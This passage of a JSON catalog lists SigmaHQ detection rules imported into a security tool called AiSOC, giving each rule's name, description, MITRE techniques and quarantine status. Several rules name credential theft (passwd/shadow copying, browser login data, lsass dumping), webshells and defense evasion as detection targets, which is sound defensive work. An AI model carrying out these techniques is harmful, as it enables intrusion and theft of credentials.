Pattern", "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1018", "T1033", "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chopper-webshell-process-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" } }, { "id": "sigmahq-sigma-fa4aaed5-4fe0-498d-bbc0-08e3346387ba", "type": "detection", "name": "Copy Passwd Or Shadow From TMP Path", "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-passwd-or-shadow-from-tmp-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" } }, { "id": "sigmahq-sigma-fa5b1358-b040-4403-9868-15f7d9ab6329", "type": "detection", "name": "Network Communication With Crypto Mining Pool", "description": "Detects initiated network connections to crypto mining pools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/network-communication-with-crypto-mining-pool.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa5b1358-b040-4403-9868-15f7d9ab6329", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_crypto_mining_pools.yml" } }, { "id": "sigmahq-sigma-fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", "type": "detection", "name": "Suspicious Get Local Groups Information - PowerShell", "description": "Detects the use of PowerShell modules and cmdlets to gather local group information.\nAdversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-local-groups-information-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" } }, { "id": "sigmahq-sigma-fa7703d6-0ee8-4949-889c-48c84bc15b6f", "type": "detection", "name": "New Kind of Network (NKN) Detection", "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-kind-of-network-nkn-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_nkn.yml" } }, { "id": "sigmahq-sigma-fa84aaf5-8142-43cd-9ec2-78cfebf878ce", "type": "detection", "name": "Temporary Access Pass Added To An Account", "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/temporary-access-pass-added-to-an-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_tap_added.yml" } }, { "id": "sigmahq-sigma-fa935401-513b-467b-81f4-f9e77aa0dd78", "type": "detection", "name": "Crypto Miner User Agent", "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crypto-miner-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa935401-513b-467b-81f4-f9e77aa0dd78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_cryptominer.yml" } }, { "id": "sigmahq-sigma-faa031b5-21ed-4e02-8881-2591f98d82ed", "type": "detection", "name": "Unauthorized System Time Modification", "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unauthorized-system-time-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "faa031b5-21ed-4e02-8881-2591f98d82ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_time_modification.yml" } }, { "id": "sigmahq-sigma-faa48cae-6b25-4f00-a094-08947fef582f", "type": "detection", "name": "Rar Usage with Password and Compression Level", "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rar-usage-with-password-and-compression-level.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "faa48cae-6b25-4f00-a094-08947fef582f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml" } }, { "id": "sigmahq-sigma-fabb0e80-030c-4e3e-a104-d09676991ac3", "type": "detection", "name": "Suspicious File Created in Outlook Temporary Directory", "description": "Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.\nThis can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-in-outlook-temporary-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fabb0e80-030c-4e3e-a104-d09676991ac3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml" } }, { "id": "sigmahq-sigma-fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd", "type": "detection", "name": "Potential ReflectDebugger Content Execution Via WerFault.EXE", "description": "Detects execution of \"WerFault.exe\" with the \"-pr\" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-reflectdebugger-content-execution-via-werfault-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml" } }, { "id": "sigmahq-sigma-fad91067-08c5-4d1a-8d8c-d96a21b37814", "type": "detection", "name": "Potential PowerShell Execution Policy Tampering", "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-execution-policy-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml" } }, { "id": "sigmahq-sigma-fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd", "type": "detection", "name": "Cloudflared Portable Execution", "description": "Detects the execution of the \"cloudflared\" binary from a non standard location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-portable-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml" } }, { "id": "sigmahq-sigma-fb3722e4-1a06-46b6-b772-253e2e7db933", "type": "detection", "name": "Function Call From Undocumented COM Interface EditionUpgradeManager", "description": "Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/function-call-from-undocumented-com-interface-editionupgrademanager.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb3722e4-1a06-46b6-b772-253e2e7db933", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml" } }, { "id": "sigmahq-sigma-fb4e2211-6d08-426b-8e6f-0d4a161e3b1d", "type": "detection", "name": "Clfs.SYS Loaded By Process Located In a Potential Suspicious Location", "description": "Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clfs-sys-loaded-by-process-located-in-a-potential-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb4e2211-6d08-426b-8e6f-0d4a161e3b1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_clfs_load.yml" } }, { "id": "sigmahq-sigma-fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "type": "detection", "name": "Disabled IE Security Features", "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-ie-security-features.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml" } }, { "id": "sigmahq-sigma-fb656378-f909-47c1-8747-278bf09f4f4f", "type": "detection", "name": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-attempt-via-powershell-remote-thread.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb656378-f909-47c1-8747-278bf09f4f4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml" } }, { "id": "sigmahq-sigma-fb843269-508c-4b76-8b8d-88679db22ce7", "type": "detection", "name": "Suspicious Execution of Powershell with Base64", "description": "Commandline to launch powershell with a base64 payload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-powershell-with-base64.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb843269-508c-4b76-8b8d-88679db22ce7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_encode.yml" } }, { "id": "sigmahq-sigma-fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", "type": "detection", "name": "Execution of Powershell Script in Public Folder", "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-of-powershell-script-in-public-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" } }, { "id": "sigmahq-sigma-fbc5e92f-3044-4e73-a5c6-1c4359b539de", "type": "detection", "name": "PowerShell Script With File Hostname Resolving Capabilities", "description": "Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-with-file-hostname-resolving-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fbc5e92f-3044-4e73-a5c6-1c4359b539de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml" } }, { "id": "sigmahq-sigma-fbd7c32d-db2a-4418-b92c-566eb8911133", "type": "detection", "name": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syncappvpublishingserver-execute-arbitrary-powershell-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fbd7c32d-db2a-4418-b92c-566eb8911133", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" } }, { "id": "sigmahq-sigma-fc014922-5def-4da9-a0fc-28c973f41bfb", "type": "detection", "name": "Execution DLL of Choice Using WAB.EXE", "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-dll-of-choice-using-wab-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" } }, { "id": "sigmahq-sigma-fc028194-969d-4122-8abe-0470d5b8f12f", "type": "detection", "name": "Access to Browser Login Data", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/access-to-browser-login-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc028194-969d-4122-8abe-0470d5b8f12f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" } }, { "id": "sigmahq-sigma-fc0e89b5-adb0-43c1-b749-c12a10ec37de", "type": "detection", "name": "SafeBoot Registry Key Deleted Via Reg.EXE", "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/safeboot-registry-key-deleted-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" } }, { "id": "sigmahq-sigma-fc4f4817-0c53-4683-a4ee-b17a64bc1039", "type": "detection", "name": "Suspicious Desktopimgdownldr Target File", "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-desktopimgdownldr-target-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" } }, { "id": "sigmahq-sigma-fca949cc-79ca-446e-8064-01aa7e52ece5", "type": "detection", "name": "HackTool - PCHunter Execution", "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1057", "T1012", "T1083", "T1007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-pchunter-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fca949cc-79ca-446e-8064-01aa7e52ece5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml" } }, { "id": "sigmahq-sigma-fcc6d700-68d9-4241-9a1a-06874d621b06", "type": "detection", "name": "Suspicious File Created Via OneNote Application", "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-via-onenote-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml" } }, { "id": "sigmahq-sigma-fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "type": "detection", "name": ".RDP File Created By Uncommon Application", "description": "Detects creation of a file with an \".rdp\" extension by an application that doesn't commonly create such files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-file-created-by-uncommon-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml" } }, { "id": "sigmahq-sigma-fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "type": "detection", "name": "Disabled Windows Defender Eventlog", "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-windows-defender-eventlog.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" } }, { "id": "sigmahq-sigma-fcdf69e5-a3d3-452a-9724-26f2308bf2b1", "type": "detection", "name": "Phishing Pattern ISO in Archive", "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/phishing-pattern-iso-in-archive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml" } }, { "id": "sigmahq-sigma-fd0f5778-d3cb-4c9a-9695-66759d04702a", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 